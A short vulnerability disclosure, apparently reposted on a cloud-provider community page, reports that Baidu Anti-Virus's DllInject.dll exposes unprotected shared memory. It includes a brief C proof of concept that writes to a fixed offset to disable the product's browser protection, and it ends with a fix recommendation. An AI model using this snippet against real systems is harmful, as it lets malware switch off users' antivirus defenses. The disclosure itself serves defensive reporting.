Baidu anti-virus shared memory vulnerability causes access protection to fail

Source: Internet
Author: User

Baidu anti-virus shared memory vulnerability causes access protection to fail

DllInject. dll uses shared memory data and has no permission to check it. Any process can modify it, resulting in Baidu's Anti-Virus defense against browsers being ineffective.

Take chrome as an example:

Before Attack:
 



After the attack:
 



As you can see, after the attack, chrome will not load some functional DLL such as Baidu anti-virus WebSafe and WebMonHook.

LPCTSTR lpszDll = _ T ("C: \ Program Files \ Baidu \ BaiduSd \ 2.1.0.3086 \ websafe \ DllInject. dll "); HMODULE hMod = LoadLibrary (lpszDll); DWORD * mongoaddr = (DWORD *) (DWORD) hMod + 0x6000); // For 2.1.0.3086 DllInject. dll * mongoaddr = 0;
Solution: use more secure Memory sharing methods to increase permission control.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.